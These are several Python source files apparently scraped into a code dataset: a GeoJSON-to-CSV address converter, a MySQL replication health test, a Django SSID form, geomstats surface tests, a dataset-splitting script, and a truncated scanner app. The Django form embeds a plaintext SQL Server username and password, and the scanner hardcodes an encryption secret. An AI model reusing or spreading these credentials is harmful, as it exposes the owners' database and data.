'SIG_CD': [],\n 'SIG_ENG_NM': [],\n 'SIG_KOR_NM': [],\n 'EMD_CD': [],\n 'EMD_ENG_NM': [],\n 'EMD_KOR_NM': [],\n 'geometry': [],\n}\n\ndf = pd.DataFrame(datas)\n\nprint('merge CTPRVN info...')\nfor elem in CTRPVN['features']:\n df = df.append({\n 'CTPRVN_CD': elem['properties']['CTPRVN_CD'],\n 'CTPRVN_ENG_NM': elem['properties']['CTP_ENG_NM'],\n 'CTPRVN_KOR_NM': elem['properties']['CTP_KOR_NM'],\n 'SIG_CD': None,\n 'SIG_ENG_NM': None,\n 'SIG_KOR_NM': None,\n 'EMD_CD': None,\n 'EMD_ENG_NM': None,\n 'EMD_KOR_NM': None,\n 'geometry': json.dumps(elem['geometry']),\n }, ignore_index=True)\n\n\nprint('merge SIG info...')\nfor elem in SIG['features']:\n df = df.append({\n 'CTPRVN_CD': None,\n 'CTPRVN_ENG_NM': None,\n 'CTPRVN_KOR_NM': None,\n 'SIG_CD': elem['properties']['SIG_CD'],\n 'SIG_ENG_NM': elem['properties']['SIG_ENG_NM'],\n 'SIG_KOR_NM': elem['properties']['SIG_KOR_NM'],\n 'EMD_CD': None,\n 'EMD_ENG_NM': None,\n 'EMD_KOR_NM': None,\n 'geometry': json.dumps(elem['geometry']),\n }, ignore_index=True)\n\nprint('merge EMD info...')\nfor elem in EMD['features']:\n df = df.append({\n 'CTPRVN_CD': None,\n 'CTPRVN_ENG_NM': None,\n 'CTPRVN_KOR_NM': None,\n 'SIG_CD': None,\n 'SIG_ENG_NM': None,\n 'SIG_KOR_NM': None,\n 'EMD_CD': elem['properties']['EMD_CD'],\n 'EMD_ENG_NM': elem['properties']['EMD_ENG_NM'],\n 'EMD_KOR_NM': elem['properties']['EMD_KOR_NM'],\n 'geometry': json.dumps(elem['geometry']),\n }, ignore_index=True)\n\nprint('fill CTRPVN, SIG info...')\ndf.loc[df.SIG_CD.notnull(), 'CTPRVN_CD'] = df[df.SIG_CD.notnull()].SIG_CD.str[:2]\ndf.loc[df.EMD_CD.notnull(), 'CTPRVN_CD'] = df[df.EMD_CD.notnull()].EMD_CD.str[:2]\ndf.loc[df.EMD_CD.notnull(), 'SIG_CD'] = df[df.EMD_CD.notnull()].EMD_CD.str[:5]\n\nfor CTPRVN_CD in df.CTPRVN_CD.unique():\n df.loc[df.CTPRVN_CD == CTPRVN_CD, 'CTPRVN_ENG_NM'] = df.loc[df.CTPRVN_CD == CTPRVN_CD, 'CTPRVN_ENG_NM'].iloc[0]\n df.loc[df.CTPRVN_CD == CTPRVN_CD, 'CTPRVN_KOR_NM'] = df.loc[df.CTPRVN_CD == CTPRVN_CD, 'CTPRVN_KOR_NM'].iloc[0]\n\nfor SIG_CD in df.SIG_CD.dropna().unique():\n df.loc[df.SIG_CD == SIG_CD, 'SIG_ENG_NM'] = df.loc[df.SIG_CD == SIG_CD, 'SIG_ENG_NM'].iloc[0]\n df.loc[df.SIG_CD == SIG_CD, 'SIG_KOR_NM'] = df.loc[df.SIG_CD == SIG_CD, 'SIG_KOR_NM'].iloc[0]\n\ndf.to_csv('csv/KOREA-ADDR-WGS84.csv', index=False)\n","sub_path":"addresskr/json2csv.py","file_name":"json2csv.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"81392094","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2013 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\nimport traceback\n\nfrom fuel_health.common.ssh import Client as SSHClient\nfrom fuel_health.common.utils import data_utils\nimport fuel_health.test\n\nLOG = logging.getLogger(__name__)\n\n\nclass TestMysqlReplication(fuel_health.test.BaseTestCase):\n @classmethod\n def setUpClass(cls):\n super(TestMysqlReplication, cls).setUpClass()\n cls.controller_ip = cls.config.compute.online_controllers[0]\n cls.controllers = cls.config.compute.online_controllers\n cls.controller_key = cls.config.compute.path_to_private_key\n cls.controller_user = cls.config.compute.ssh_user\n cls.mysql_user = 'root'\n cls.database = 'ost1' + str(data_utils.rand_int_id(100, 999))\n cls.master_ip = []\n\n def setUp(self):\n super(TestMysqlReplication, self).setUp()\n if 'ha' not in self.config.compute.deployment_mode:\n self.skipTest('Cluster is not HA mode, skipping tests')\n if len(self.controllers) == 1:\n self.skipTest('There is only one controller online. '\n 'Nothing to check')\n\n @classmethod\n def tearDownClass(cls):\n if cls.master_ip:\n try:\n cmd = \"mysql -e 'DROP DATABASE %s'\" % cls.database\n\n SSHClient(cls.master_ip[0], cls.controller_user,\n key_filename=cls.controller_key).exec_command(cmd)\n except Exception:\n LOG.debug(traceback.format_exc())\n\n def test_mysql_replication(self):\n \"\"\"Check data replication over mysql\n Target Service: HA mysql\n\n Scenario:\n 1. Detect mysql node.\n 2. Create database on detected node\n 3. Create table in created database\n 4. Insert data to the created table\n 5. Get replicated data from each controller.\n 6. Verify that replicated data in the same from each controller\n 7. Drop created database\n Duration: 100 s.\n \"\"\"\n # Find mysql master node\n master_node_ip = []\n cmd = 'mysql -e \"SHOW SLAVE STATUS\\G\"'\n LOG.info(\"Controllers nodes are %s\" % self.controllers)\n for controller_ip in self.controllers:\n ssh_client = SSHClient(\n controller_ip, self.controller_user,\n key_filename=self.controller_key, timeout=100)\n output = self.verify(\n 20, ssh_client.exec_command, 1,\n 'Can not connect to mysql. '\n 'Please check that mysql is running and there '\n 'is connectivity by management network',\n 'detect mysql node', cmd)\n LOG.info('output is %s' % output)\n if not output:\n self.master_ip.append(controller_ip)\n master_node_ip.append(controller_ip)\n\n database_name = self.database\n table_name = 'ost' + str(data_utils.rand_int_id(100, 999))\n record_data = str(data_utils.rand_int_id(1000000000, 9999999999))\n\n create_database = 'mysql -e \"CREATE DATABASE IF NOT EXISTS %s\"'\\\n % database_name\n create_table = 'mysql -e \"CREATE TABLE IF NOT EXISTS'\\\n ' %(database)s.%(table)s'\\\n ' (data VARCHAR(100))\"'\\\n % {'database': database_name,\n 'table': table_name}\n create_record = 'mysql -e \"INSERT INTO %(database)s.%(table)s (data)'\\\n ' VALUES(%(data)s)\"'\\\n % {'database': database_name,\n 'table': table_name,\n 'data': record_data}\n get_record = 'mysql -e \"SELECT * FROM %(database)s.%(table)s '\\\n 'WHERE data = \\\"%(data)s\\\"\"'\\\n % {'database': database_name,\n 'table': table_name,\n 'data': record_data}\n\n # create db, table, insert data on master\n LOG.info('master node ip %s' % master_node_ip[0])\n master_ssh_client = SSHClient(master_node_ip[0], self.controller_user,\n key_filename=self.controller_key,\n timeout=100)\n\n self.verify(20, master_ssh_client.exec_command, 2,\n 'Database creation failed', 'create database',\n create_database)\n LOG.info('create database')\n self.verify(20, master_ssh_client.exec_command, 3,\n 'Table creation failed', 'create table', create_table)\n LOG.info('create table')\n self.verify(20, master_ssh_client.exec_command, 4,\n 'Can not insert data in created table', 'data insertion',\n create_record)\n LOG.info('create data')\n\n # Verify that data is replicated on other controllers\n for controller in self.controllers:\n if controller not in master_node_ip:\n client = SSHClient(controller,\n self.controller_user,\n key_filename=self.controller_key)\n\n output = self.verify(\n 20, client.exec_command, 5,\n 'Can not get data from controller %s' % controller,\n 'get_record', get_record)\n\n self.verify_response_body(output, record_data,\n msg='Expected data missing',\n failed_step='6')\n\n # Drop created db\n cmd = \"mysql -e 'DROP DATABASE %s'\" % self.database\n ssh_client = SSHClient(master_node_ip[0], self.controller_user,\n key_filename=self.controller_key)\n self.verify(20, ssh_client.exec_command, 7,\n 'Can not delete created database',\n 'database deletion', cmd)\n self.master_ip = []\n","sub_path":"fuel_health/tests/ha/test_mysql_replication.py","file_name":"test_mysql_replication.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"157912227","text":"from django.core.exceptions import ValidationError\nfrom django import forms\n\ndef valid_show(value):\n if '0' == value:\n raise ValidationError('Choose a show')\n\ndef valid_passw(value):\n if '?' in value:\n raise ValidationError('?')\n\ndef valid_vlan(value):\n if value == 207 or value > 704 and value < 715:\n pass\n else:\n raise ValidationError('Wrong VLAN')\n\ndef valid_wid(value):\n if value == None or value > 99 and value < 121:\n pass\n else:\n raise ValidationError('Wrong WID')\n\n\nclass addssidForm(forms.Form):\n\n RADIO_LIST = (\n ('1', '2.4 GHz'),\n ('2', '5.0 GHz'),\n )\n\n AP_LIST1 = []\n AP_LIST2 = []\n AP_LIST3 = []\n AP_LIST4 = []\n f = open('C:\\\\webs\\\\mysite\\\\tempinfo\\\\level1.txt', 'r')\n addssid = f.readlines()\n f.close()\n for ap in addssid:\n if '#lev' in ap:\n LEVEL = ap\n else:\n if '1' in LEVEL:\n ap1 = ap.replace('-',' ')\n ap1 = ap1.replace('_',' ')\n AP_LIST1.append((ap,ap1))\n if '2' in LEVEL:\n ap1 = ap.replace('-',' ')\n ap1 = ap1.replace('_',' ')\n AP_LIST2.append((ap,ap1))\n if '3' in LEVEL:\n ap1 = ap.replace('-',' ')\n ap1 = ap1.replace('_',' ')\n AP_LIST3.append((ap,ap1))\n if '4' in LEVEL:\n ap1 = ap.replace('-',' ')\n if '_4' in ap:\n ap1 = 'Beehive'\n ap1 = ap1.replace('_',' ')\n AP_LIST4.append((ap,ap1))\n\n show = forms.ChoiceField(choices=[])\n\n def __init__(self, *args, **kwargs):\n try:\n import pyodbc\n sqlconn = pyodbc.connect('DRIVER={ODBC Driver 17 for SQL Server};SERVER=nyccoc-sql-02;DATABASE=ShowDB;UID=ShowDBuser;PWD=zQ+GZ*[z!EtCXv5)')\n cur = sqlconn.cursor()\n sql = \"\"\"SELECT name FROM shows WHERE GETDATE() between dateadd(day, -7, move_in) and dateadd(day, 3, move_out) ORDER BY move_in\"\"\"\n cur.execute(sql)\n item = cur.fetchone()\n SHOW_LIST = []\n SHOW_LIST.append(('', 'SELECT SHOW'))\n\n while item is not None:\n item = str(item)[2:-4]\n SHOW_LIST.append((item, item))\n item = cur.fetchone()\n except:\n SHOW_LIST = [('0','Cannot Connect to SQL Server')]\n\n super(addssidForm, self).__init__(*args, **kwargs)\n self.fields['show'] = forms.ChoiceField(choices=SHOW_LIST,\n validators=[valid_show])\n\n\n name = forms.CharField(\n required=True,\n max_length=30,)\n\n passw = forms.CharField(\n required=False,\n min_length=8,\n max_length=30,\n validators=[valid_passw])\n\n vlan = forms.IntegerField(\n initial=207,\n validators=[valid_vlan])\n\n frequency = forms.CharField(\n required=True,\n widget=forms.CheckboxSelectMultiple(\n choices=RADIO_LIST,\n attrs={'checked' : 'checked'}))\n\n wid = forms.IntegerField(\n required=False,\n validators=[valid_wid])\n\n apgroups1 = forms.CharField(\n required=False,\n widget=forms.CheckboxSelectMultiple(\n choices=AP_LIST1,\n attrs={'unchecked': 'unchecked'}\n ))\n apgroups2 = forms.CharField(\n required=False,\n widget=forms.CheckboxSelectMultiple(\n choices=AP_LIST2,\n attrs={'unchecked': 'unchecked'}\n ))\n apgroups3 = forms.CharField(\n required=False,\n widget=forms.CheckboxSelectMultiple(\n choices=AP_LIST3,\n attrs={'unchecked': 'unchecked'}\n ))\n apgroups4 = forms.CharField(\n required=False,\n widget=forms.CheckboxSelectMultiple(\n choices=AP_LIST4,\n attrs={'unchecked': 'unchecked'}\n ))\n\n def clean(self):\n cleaned_data = super(addssidForm, self).clean()\n ap1 = cleaned_data.get(\"apgroups1\")\n ap2 = cleaned_data.get(\"apgroups2\")\n ap3 = cleaned_data.get(\"apgroups3\")\n ap4 = cleaned_data.get(\"apgroups4\")\n aps = ap1+ap2+ap3+ap4\n if aps == \"\":\n raise ValidationError('No APs')\n","sub_path":"addssid/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"22111925","text":"\"\"\"Unit tests for discrete_surfaces modules.\"\"\"\n\nimport geomstats.backend as gs\nfrom tests.conftest import Parametrizer, autograd_backend, pytorch_backend\nfrom tests.data.discrete_surfaces_data import (\n DiscreteSurfacesTestData,\n ElasticMetricTestData,\n)\nfrom tests.geometry_test_cases import ManifoldTestCase, RiemannianMetricTestCase\n\n\nclass TestDiscreteSurfaces(ManifoldTestCase, metaclass=Parametrizer):\n testing_data = DiscreteSurfacesTestData()\n\n def test_vertex_areas(self, faces, point):\n \"\"\"Test vertex_areas.\n\n Vertex area is the area of all of the triangles who are in contact\n with a specific vertex, according to the formula:\n vertex_areas = 2 * sum_incident_areas / 3.0\n\n We test this on a space whose initializing\n point is a cube, and we test the function on\n a cube with sides of length 2 centered at the origin.\n\n The cube is meshed with triangles, so each face should\n have area 2.\n \"\"\"\n number_of_contact_faces = gs.array([3, 5, 5, 5, 5, 5, 3, 5])\n triangle_area = 0.5 * 2 * 2\n expected = 2 * (number_of_contact_faces * triangle_area) / 3\n space = self.Space(faces)\n\n result = space.vertex_areas(point)\n assert result.shape == (8,)\n assert expected.shape == (8,)\n assert gs.allclose(result, expected), result\n\n point = gs.array([point, point])\n expected = gs.array([expected, expected])\n result = space.vertex_areas(point)\n assert point.shape == (2, 8, 3)\n assert result.shape == (2, 8), result.shape\n assert gs.allclose(result, expected), result\n\n def test_normals(self, faces, point):\n \"\"\"Test normals.\n\n We test this on a space whose initializing\n point is a cube, and we test the function on\n a cube with sides of length 2 centered at the origin.\n The cube is meshed with 12 triangles (2 triangles\n per face.)\n\n Recall that the magnitude of each normal vector is equal to\n the area of the face it is normal to.\n\n We compare the abs value of each normal vector array because:\n note that the \"normals\" variable here calculates the normals\n as pointing out of the surface, but the way that normals()\n was constructed makes it so that the normal vector could be\n pointing into the surface or out of the surface, (so it could\n either be positive or negative). Because of this, we make all\n of the normal vectors to the cube positive for testing\n purposes.\n \"\"\"\n space = self.Space(faces=faces)\n cube_normals = gs.array(\n [\n [0.0, 0.0, 2.0],\n [0.0, 0.0, 2.0],\n [0.0, 2.0, 0.0],\n [0.0, 2.0, 0.0],\n [2.0, 0.0, 0.0],\n [2.0, 0.0, 0.0],\n [0.0, -2.0, 0.0],\n [0.0, -2.0, 0.0],\n [-2.0, 0.0, 0.0],\n [-2.0, 0.0, 0.0],\n [0.0, 0.0, -2.0],\n [0.0, 0.0, -2.0],\n ]\n )\n expected = cube_normals\n\n result = space.normals(point)\n are_close = [\n (gs.allclose(res, exp) or gs.allclose(res, -exp))\n for res, exp in zip(result, expected)\n ]\n\n assert gs.all(are_close)\n\n point = gs.array([point, point])\n result = space.normals(point)\n are_close_0 = [\n (gs.allclose(res, exp) or gs.allclose(res, -exp))\n for res, exp in zip(result[0], expected)\n ]\n are_close_1 = [\n (gs.allclose(res, exp) or gs.allclose(res, -exp))\n for res, exp in zip(result[1], expected)\n ]\n assert gs.all(gs.array([are_close_0, are_close_1]))\n\n def test_surface_one_forms(self, faces, point):\n \"\"\"Test surface one forms.\"\"\"\n space = self.Space(faces=faces)\n\n result = space.surface_one_forms(point=point)\n assert result.shape == (space.n_faces, 2, 3), result.shape\n\n first_vec = result[:, 0, :]\n second_vec = result[:, 1, :]\n inner_prods = gs.einsum(\"ni,ni->n\", first_vec, second_vec)\n result = [prod in [0.0, 4.0] for prod in inner_prods]\n assert gs.all(result)\n\n singleton_point = gs.expand_dims(point, axis=0)\n result = space.surface_one_forms(point=singleton_point)\n assert result.shape == (1, space.n_faces, 2, 3)\n\n point = gs.array([point, point])\n result = space.surface_one_forms(point=point)\n assert result.shape == (2, space.n_faces, 2, 3)\n\n first_vec = result[:, :, 0, :]\n second_vec = result[:, :, 1, :]\n inner_prods = gs.einsum(\"mni,mni->mn\", first_vec, second_vec)\n result = []\n for inner_prod in inner_prods:\n result.append([prod in [0.0, 4.0] for prod in inner_prod])\n assert gs.all(result)\n\n def test_faces_area(self, faces, point):\n \"\"\"Test faces area.\"\"\"\n space = self.Space(faces=faces)\n\n result = space.face_areas(point=point)\n expected = gs.array([4.0] * 12)\n assert result.shape == (space.n_faces,), result.shape\n assert gs.allclose(result, expected), result\n\n point = gs.array([point, point])\n result = space.face_areas(point=point)\n expected = gs.array([expected, expected])\n assert result.shape == (2, space.n_faces), result.shape\n assert gs.allclose(result, expected), result\n\n def test_surface_metric_matrices(self, faces, point):\n \"\"\"Test surface metric matrices.\"\"\"\n space = self.Space(faces=faces)\n result = space.surface_metric_matrices(point=point)\n assert result.shape == (\n space.n_faces,\n 2,\n 2,\n ), result.shape\n\n point = gs.array([point, point])\n result = space.surface_metric_matrices(point=point)\n assert result.shape == (2, space.n_faces, 2, 2)\n\n def test_laplacian(self, faces, point, tangent_vec, expected):\n \"\"\"Test laplacian operator.\"\"\"\n space = self.Space(faces=faces)\n\n n_vertices = point.shape[-2]\n result = space.laplacian(point=point)(tangent_vec)\n assert result.shape == (n_vertices, 3), result.shape\n\n assert gs.allclose(result, expected), result\n\n tangent_vec = gs.array([tangent_vec, tangent_vec])\n result = space.laplacian(point=point)(tangent_vec)\n assert result.shape == (2, n_vertices, 3), result.shape\n\n\nclass TestElasticMetric(RiemannianMetricTestCase, metaclass=Parametrizer):\n skip_all = not (autograd_backend() or pytorch_backend())\n skip_test_exp_shape = autograd_backend()\n skip_test_log_shape = autograd_backend()\n skip_test_parallel_transport_ivp_is_isometry = True\n skip_test_parallel_transport_bvp_is_isometry = True\n skip_test_exp_after_log = True\n skip_test_exp_ladder_parallel_transport = True\n skip_test_log_after_exp = True\n skip_test_dist_is_positive = autograd_backend()\n skip_test_dist_point_to_itself_is_zero = autograd_backend()\n skip_test_exp_belongs = autograd_backend()\n skip_test_exp_geodesic_ivp = autograd_backend()\n skip_test_geodesic_bvp_belongs = autograd_backend()\n skip_test_geodesic_ivp_belongs = autograd_backend()\n skip_test_log_is_tangent = autograd_backend()\n skip_test_squared_dist_is_positive = autograd_backend()\n skip_test_dist_is_symmetric = True\n skip_test_dist_is_norm_of_log = True\n skip_test_triangle_inequality_of_dist = True\n skip_test_squared_dist_is_symmetric = True\n skip_test_covariant_riemann_tensor_is_skew_symmetric_1 = True\n skip_test_covariant_riemann_tensor_is_skew_symmetric_2 = True\n skip_test_covariant_riemann_tensor_bianchi_identity = True\n skip_test_covariant_riemann_tensor_is_interchange_symmetric = True\n skip_test_riemann_tensor_shape = True\n skip_test_scalar_curvature_shape = True\n skip_test_ricci_tensor_shape = True\n skip_test_sectional_curvature_shape = True\n\n testing_data = ElasticMetricTestData()\n\n def test_path_energy_per_time_is_positive(\n self, space, a0, a1, b1, c1, d1, a2, path, atol\n ):\n \"\"\"Check that energy of a path of surfaces is positive at each time-step.\n\n Parameters\n ----------\n space : DiscreteSurfaces\n Space of discrete surfaces associated with the ElasticMetric.\n a0, a1, b1, c1, d1, a2 : floats\n Parameters of the ElasticMetric.\n path : array-like, shape=[n_time_steps, n_vertices, 3]\n Path in the space of discrete surfaces.\n atol : float\n Absolute tolerance to test this property.\n \"\"\"\n n_times = len(path)\n space.equip_with_metric(self.Metric, a0=a0, a1=a1, b1=b1, c1=c1, d1=d1, a2=a2)\n\n energy = space.metric.path_energy_per_time(path)\n\n self.assertAllEqual(energy.shape, (n_times - 1, 1))\n result = gs.all(energy > -1 * atol)\n self.assertTrue(result)\n\n expected_shape = (2, n_times - 1, 1)\n path = gs.array([path, path])\n energy = space.metric.path_energy_per_time(path)\n self.assertAllEqual(energy.shape, expected_shape)\n result = gs.all(energy > -1 * atol)\n self.assertTrue(result)\n\n def test_path_energy_is_positive(self, space, a0, a1, b1, c1, d1, a2, path, atol):\n \"\"\"Check that energy of a path of surfaces is positive at each time-step.\n\n Parameters\n ----------\n space : DiscreteSurfaces\n Space of discrete surfaces associated with the ElasticMetric.\n a0, a1, b1, c1, d1, a2 : floats\n Parameters of the ElasticMetric.\n path : array-like, shape=[n_time_steps, n_vertices, 3]\n Path in the space of discrete surfaces.\n atol : float\n Absolute tolerance to test this property.\n \"\"\"\n space.equip_with_metric(self.Metric, a0=a0, a1=a1, b1=b1, c1=c1, d1=d1, a2=a2)\n\n energy = space.metric.path_energy(path)\n self.assertAllEqual(energy.shape, ())\n result = gs.all(energy > -1 * atol)\n self.assertTrue(result)\n\n path = gs.array([path, path])\n energy = space.metric.path_energy(path)\n self.assertAllEqual(energy.shape, (2,))\n result = gs.all(energy > -1 * atol)\n self.assertTrue(result)\n","sub_path":"tests/tests_geomstats/test_discrete_surfaces.py","file_name":"test_discrete_surfaces.py","file_ext":"py","file_size_in_byte":10341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"127196219","text":"import os\nimport shutil\nimport random\nimport collections\nimport pandas as pd\nfrom scipy.io import loadmat\nfrom PIL import Image\nfrom argparse import ArgumentParser\n\n\ndef get_gt(mat_data):\n # id: 0, objs: 3\n items = [(annots[0][0][0][0], annots[0][0][0][3]) for annots in mat_data]\n gt = []\n for item in items:\n objs = []\n for obj in item[1]:\n objs.append([obj[0][0][0][0][0], obj[0][0][0][1][0]])\n gt.append((item[0][0], objs))\n\n return gt\n\n\ndef get_img_size(img_path, gt):\n img_full_names = [\n os.path.realpath(os.path.join(img_path, item[0])) for item in gt]\n\n return [Image.open(img).size for img in img_full_names]\n\n\ndef bbox_norm(s, gt, l):\n for idx in range(len(s)):\n objs = gt[idx][1]\n for obj in objs:\n # xmin , ymin , xmax , ymax\n # obj[1][0], obj[1][1], obj[1][2], obj[1][3]\n # bbox = obj[1], idx_size = s[idx]\n\n # width = (x_max - x_min) / idx_size[0]\n width = float((obj[1][2] - obj[1][0]))\n # height = (y_max - y_min) / idx_size[1]\n height = float((obj[1][3] - obj[1][1]))\n # x_center = (x_min + width/2) / idx_size[0]\n x_center = float((obj[1][0] + width/2)) / s[idx][0]\n # y_center = (y_min + height/2) / idx_size[1]\n y_center = float((obj[1][1] + height/2)) / s[idx][1]\n\n # Update normalized bbox and binary label\n obj[1] = (x_center, y_center, width/s[idx][0], height/s[idx][1])\n obj[0] = l.index(obj[0])\n\n return gt\n\n\ndef find_labels(gt):\n checker = set()\n for img in gt:\n for item in img[1]:\n checker.add(item[0])\n\n return sorted(checker)\n\n\ndef check_dir(p):\n if os.path.exists(p):\n shutil.rmtree(p)\n os.makedirs(p, exist_ok=True)\n\n\ndef filt_cls(gts):\n filt_list = ['phone', 'coat', 'surfboard', 'watch', 'trees',\n 'ball', 'bag', 'sofa', 'glasses', 'roof', 'boat']\n rm_lst = []\n for gt in gts:\n for bbox in gt[1]:\n if bbox[0] in filt_list:\n rm_lst.append(gt)\n break\n for rm_elem in rm_lst:\n gts.remove(rm_elem)\n\n return gts\n\n\ndef cat_dist(gts):\n \"\"\"Calculate counts distribution of each categories\"\"\"\n counter = collections.Counter()\n for img, gt in gts:\n for name, bbox in gt:\n counter.update([name])\n\n return pd.Series(counter).sort_values(ascending=False)\n\n\ndef split_ds(gts, r=0.2):\n def tmp_cal(idxes):\n c = collections.defaultdict(lambda: 0)\n for i in idxes:\n for n, _ in gts[i][1]:\n c[n] += 1\n return c\n\n lbl_lst = cat_dist(gts)\n # Exclude top 3 classes, reverse\n balance_cls = lbl_lst[::-1]\n upper_bound = int(len(gts) * r)\n val_idx = set()\n added_lst = []\n for cls, counter in balance_cls.items():\n counter = int(counter * r) - tmp_cal(val_idx)[cls]\n for idx, (_, gt) in enumerate(gts):\n names = [n for n, _ in gt]\n include_added = bool(set(names).intersection(added_lst))\n if (counter <= 0) or (len(val_idx) > upper_bound):\n break\n elif (not include_added) and cls in names:\n val_idx.add(idx)\n counter -= sum([True for n in names if n == cls])\n added_lst.append(cls)\n\n val_ds = []\n for idx in val_idx:\n val_ds.append(gts[idx])\n\n return val_ds\n\n\ndef dump_labels(gt, lbl_path):\n check_dir(lbl_path)\n # item[0]: img_name, item[1]: annots\n for item in gt:\n path = os.path.join(lbl_path, item[0].split(\".\")[0]+\".txt\")\n with open(path, \"w\") as f:\n for obj in item[1]:\n _ = f.write(\"{} {:.6f} {:.6f} {:.6f} {:.6f}\\n\".format(\n obj[0], obj[1][0], obj[1][1], obj[1][2], obj[1][3]))\n\n\ndef dump_names(l, path):\n with open(path, \"w\") as f:\n for name in l:\n _ = f.write(f\"{name}\\n\")\n\n\ndef dump_ds_file(gts, t_file_path, v_file_path, img_path):\n val_ds = split_ds(gts)\n train_ds = [gt for gt in gts if gt not in val_ds]\n random.seed(82)\n random.shuffle(train_ds)\n print(len(gts))\n print(len(train_ds))\n print(len(val_ds))\n with open(t_file_path, \"w\") as f:\n for img in train_ds:\n _ = f.write(\"{}\\n\".format(os.path.join(img_path, img[0])))\n\n with open(v_file_path, \"w\") as f:\n for img in val_ds:\n _ = f.write(\"{}\\n\".format(os.path.join(img_path, img[0])))\n\n\ndef dump_data_file(path, cls_len, train, val, name):\n with open(path, \"w\") as f:\n _ = f.write(f\"classes={cls_len}\\n\")\n _ = f.write(f\"train={os.path.realpath(train)}\\n\")\n _ = f.write(f\"valid={os.path.realpath(val)}\\n\")\n _ = f.write(f\"names={os.path.realpath(name)}\\n\")\n\n\ndef run(params):\n if not os.path.exists(\"./data\"):\n raise ValueError(\"\\\"./data\\\" does not exist.\")\n if params['data_dir'] is None:\n raise ValueError(\"Please provide dataset directory\")\n mat_path = os.path.join(params['data_dir'], \"annotations.mat\")\n img_path = os.path.join(params['data_dir'], \"images/\")\n labels_path = os.path.join(params['data_dir'], \"labels/\")\n names_file_path = \"./data/unrel.names\"\n train_file_path = \"./data/unrel_train.txt\"\n val_file_path = \"./data/unrel_val.txt\"\n data_file_path = \"./data/unrel.data\"\n\n mat_data = loadmat(mat_path)\n ground_truth = get_gt(mat_data['annotations'])\n ground_truth = filt_cls(ground_truth)\n\n img_size = get_img_size(img_path, ground_truth)\n label_list = find_labels(ground_truth)\n normalized_gt = bbox_norm(img_size, ground_truth, label_list)\n\n if params['label_dir']:\n dump_labels(normalized_gt, labels_path)\n dump_names(label_list, names_file_path)\n dump_ds_file(normalized_gt, train_file_path, val_file_path, img_path)\n dump_data_file(data_file_path, len(label_list),\n train_file_path, val_file_path, names_file_path)\n\n\ndef param_loader():\n parser = ArgumentParser()\n parser.add_argument(\"--data_dir\", type=str,\n help=\"Path to dataset.\")\n parser.add_argument(\"--label_dir\", type=str, default=None,\n help=\"Path to label dir.\")\n args, _ = parser.parse_known_args()\n return vars(args)\n\n\nif __name__ == \"__main__\":\n p = param_loader()\n run(p)\n","sub_path":"data_balance/trans_dn_fmt_balanced.py","file_name":"trans_dn_fmt_balanced.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"359993956","text":"import cv2\nimport numpy as np\nimport os\nimport sys\nimport scan\nimport traceback\n\nfrom Crypto.Cipher import AES \nfrom Crypto.Hash import SHA256\n\nimport argparse\nimport time\nimport datetime\nimport requests\n\nfrom tkinter import *\n\nimport img2pdf\n\nimport internet_checker\nimport subprocess\n\nimport re\nimport json\n\nfrom shutil import copyfile, rmtree\n\nimport psutil\nfrom urllib.request import urlopen\n\n##################\nimport tempfile\nclass SingleInstanceException(BaseException):\n pass\n\n\nclass SingleInstance(object):\n\n \"\"\"Class that can be instantiated only once per machine.\n\n If you want to prevent your script from running in parallel just instantiate SingleInstance() class. If is there another instance already running it will throw a `SingleInstanceException`.\n\n >>> import tendo\n ... me = SingleInstance()\n\n This option is very useful if you have scripts executed by crontab at small amounts of time.\n\n Remember that this works by creating a lock file with a filename based on the full path to the script file.\n\n Providing a flavor_id will augment the filename with the provided flavor_id, allowing you to create multiple singleton instances from the same file. This is particularly useful if you want specific functions to have their own singleton instances.\n \"\"\"\n\n def __init__(self, flavor_id=\"\", lockfile=\"\"):\n self.initialized = False\n if lockfile:\n self.lockfile = lockfile\n else:\n basename = os.path.splitext(os.path.abspath(sys.argv[0]))[0].replace(\n \"/\", \"-\").replace(\":\", \"\").replace(\"\\\\\", \"-\") + '-%s' % flavor_id + '.lock'\n self.lockfile = os.path.normpath(\n tempfile.gettempdir() + '/' + basename)\n\n if sys.platform == 'win32':\n try:\n # file already exists, we try to remove (in case previous\n # execution was interrupted)\n if os.path.exists(self.lockfile):\n os.unlink(self.lockfile)\n self.fd = os.open(\n self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)\n except OSError:\n type, e, tb = sys.exc_info()\n if e.errno == 13:\n raise SingleInstanceException()\n print(e.errno)\n raise\n else: # non Windows\n self.fp = open(self.lockfile, 'w')\n self.fp.flush()\n try:\n fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError:\n raise SingleInstanceException()\n self.initialized = True\n\n def __del__(self):\n if not self.initialized:\n return\n try:\n if sys.platform == 'win32':\n if hasattr(self, 'fd'):\n os.close(self.fd)\n os.unlink(self.lockfile)\n else:\n fcntl.lockf(self.fp, fcntl.LOCK_UN)\n # os.close(self.fp)\n if os.path.isfile(self.lockfile):\n os.unlink(self.lockfile)\n except Exception as e:\n pass\n #sys.exit(-1)\n##################\n\nDAILY_FILE = 'log.txt'\nJSON_FILE = 'record.json'\nVERSION = '5.0'\n\nsecret = 'pleasegivemoney!'\nhash_obj = SHA256.new(secret.encode('utf-8')) \nhkey = hash_obj.digest()\nkey_name = '.key'\n\nif getattr(sys, 'frozen', False):\n base_path = sys._MEIPASS\n key_path = os.path.join(os.path.dirname(os.path.abspath(sys.executable)), 